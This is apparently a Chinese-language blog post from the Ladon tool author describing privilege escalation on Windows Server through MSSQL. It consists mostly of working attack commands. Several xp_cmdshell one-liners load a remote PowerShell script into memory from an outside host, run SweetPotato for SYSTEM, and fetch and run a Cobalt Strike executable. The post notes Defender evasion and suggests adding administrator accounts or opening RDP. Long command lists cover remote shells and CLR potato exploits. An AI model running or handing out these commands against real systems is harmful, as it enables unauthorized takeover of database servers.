测试环境
Windows Server 2016
SQL: 13.0.1601.5
Microsoft Windows [Version 10.0.14393]
Ladon本地用户权限提权
网上找了些LPE,发现直接被Defender杀,病毒库更新至2021.1.19,Ladon没被杀,管理员UAC权限可通过BypassUac提权
![使用http访问查看图片]()
MSSQL远程加载Ladon提权
执行SQL查询权限为network service
![使用http访问查看图片]()
远程内存加载PowerLadon提权
1
| exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxxxx.800/Ladon.ps1''); Ladon SweetPotato "whoami""'
|
![使用http访问查看图片]()
ECHO写入BAT执行多行命令提权
1
| exec master..xp_cmdshell 'echo whoami > c:\users\public\test.bat'
|
可ECHO写入添加管理员用户命令或者开3389等操作(举一反三不要只懂WHOAMI)
使用SYSTEM权限执行BAT
1
| exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\test.bat""'
|
Wget下载Coblat Strkie的EXE
1
| exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon wget http://k8gege.org/cs.exe"'
|
使用SYSTEM权限执行CS
1
| exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\cs.exe""'
|
Mssql数据库远程提权工具
![使用http访问查看图片]()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
| 本地:
Ladon MssqlCmd host info Ladon MssqlCmd host open_shell Ladon MssqlCmd host close_shell Ladon MssqlCmd host xp_cmdshell cmdline Ladon MssqlCmd host ws_shell cmdline Ladon MssqlCmd host r_shell cmdline Ladon MssqlCmd host py_shell cmdline Ladon MssqlCmd host install_clr Ladon MssqlCmd host uninstall_clr Ladon MssqlCmd host clr_exec cmdline Ladon MssqlCmd host clr_efspotato cmdline Ladon MssqlCmd host clr_badpotato cmdline
远程:
Ladon MssqlCmd host user pass master info Ladon MssqlCmd host port user pass master open_shell Ladon MssqlCmd host port user pass master close_shell Ladon MssqlCmd host user pass master xp_cmdshell cmdline Ladon MssqlCmd host user pass master ws_shell cmdline Ladon MssqlCmd host user pass master r_shell cmdline Ladon MssqlCmd host user pass master py_shell cmdline Ladon MssqlCmd host user pass master install_clr Ladon MssqlCmd host user pass master uninstall_clr Ladon MssqlCmd host user pass master clr_exec cmdline Ladon MssqlCmd host user pass master clr_efspotato cmdline Ladon MssqlCmd host user pass master clr_badpotato cmdline
|
![使用http访问查看图片]()
Cobalt Strike
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
| 本机: shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host info shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host open_shell shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host close_shell shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host xp_cmdshell cmdline shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host ws_shell cmdline shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host r_shell cmdline shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host py_shell cmdline shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host install_clr shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host uninstall_clr shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_exec cmdline shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_efspotato cmdline shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_badpotato cmdline
远程: shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master info shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host port user pass master open_shell shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host port user pass master close_shell shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master xp_cmdshell cmdline shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master ws_shell cmdline shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master r_shell cmdline shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master py_shell cmdline shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master install_clr shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master uninstall_clr shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_exec cmdline shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_efspotato cmdline shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_badpotato cmdline
|
工具下载
最新版本:http://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
转载声明
K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org